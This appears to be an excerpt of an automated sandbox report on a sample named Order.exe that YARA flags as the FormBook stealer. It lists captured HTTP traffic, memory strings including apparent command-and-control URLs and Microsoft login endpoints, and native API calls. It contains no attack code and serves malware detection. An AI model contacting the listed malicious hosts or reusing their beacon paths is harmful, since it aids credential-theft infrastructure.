                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 14:32:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 12 Nov 2024 14:32:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 12 Nov 2024 14:32:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 12 Nov 2024 14:32:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 12 Nov 2024 14:32:29 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3126216814.0000000000A82000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vibixx.site
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3126216814.0000000000A82000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vibixx.site/4xim/
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: fc.exe, 0000000C.00000002.3119481100.0000000003421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: fc.exe, 0000000C.00000003.2023618471.00000000083B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: fc.exe, 0000000C.00000003.2028971511.00000000083D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000619A000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.000000000487A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3131355528.00000000068E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3136990713.000000000632C000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 0000000C.00000002.3128369382.0000000004A0C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.ultrawin23.shop/53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3126216814.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127049322.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3127133460.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1783850958.0000000001D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1784067964.0000000003230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3128071323.0000000003700000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Order.exe
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_0042C633 NtClose,9_2_0042C633
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02B60 NtClose,LdrInitializeThunk,9_2_01A02B60
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01A02DF0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01A02C70
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A035C0 NtCreateMutant,LdrInitializeThunk,9_2_01A035C0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A04340 NtSetContextThread,9_2_01A04340
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A04650 NtSuspendThread,9_2_01A04650
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02BA0 NtEnumerateValueKey,9_2_01A02BA0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02B80 NtQueryInformationFile,9_2_01A02B80
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02BE0 NtQueryValueKey,9_2_01A02BE0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02BF0 NtAllocateVirtualMemory,9_2_01A02BF0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02AB0 NtWaitForSingleObject,9_2_01A02AB0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02AF0 NtWriteFile,9_2_01A02AF0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02AD0 NtReadFile,9_2_01A02AD0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02DB0 NtEnumerateKey,9_2_01A02DB0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02DD0 NtDelayExecution,9_2_01A02DD0
                Source: C:\Users\user\Desktop\Order.exeCode function: 9_2_01A02D30 NtUnmapViewOfSection,9_2_01A02D30
